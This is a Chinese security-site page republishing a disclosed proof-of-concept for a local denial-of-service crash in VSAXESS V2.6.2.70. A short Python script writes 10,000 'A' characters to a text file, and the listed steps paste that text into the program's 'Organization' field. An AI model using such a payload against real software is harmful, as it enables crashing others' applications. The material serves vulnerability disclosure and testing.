首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)
来源:vfocus.net 作者:Santamaria 发布时间:2018-11-07  
# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-11-05
# Vendor Homepage: https:https://www.visionistech.com/en/home/
# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
# Tested Version: V2.6.2.70 build20171226_053
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
 
# Steps to Reproduce:
 
# 1. Run the python code organization.py
# 2. Open organization_exploit.txt and copy the content
# 3. Open VSAXESS.exe
# 4. Register a password and username
# 5. choose 'Control Panel'
# 6. choose 'Access Control'
# 7. choose 'Add'
# 8. Paste the content from organization_exploit.txt on 'Organization' and Crashed
 
#!/usr/bin/env python3
 
content = "\x41" * 10000
f = open ("organization_exploit.txt", "w")
f.write(content)
f.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·libiec61850 1.3 - Stack Based
·Microsoft Windows 10 (Build 17
·eToolz 3.4.8.0 - Denial of Ser
·HeidiSQL 9.5.0.5196 - Denial o
·Arm Whois 3.11 - Buffer Overfl
·TP-Link Archer C50 Wireless Ro
·CMS Made Simple 2.2.7 - Remote
·CuteFTP 9.3.0.3 - Denial of Se
·Dell OpenManage Network Manage
·Mongoose Web Server 6.9 - Deni
·Blue Server 1.1 Denial Of Serv
·CuteFTP Mac 3.1 - Denial of Se
  推荐广告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved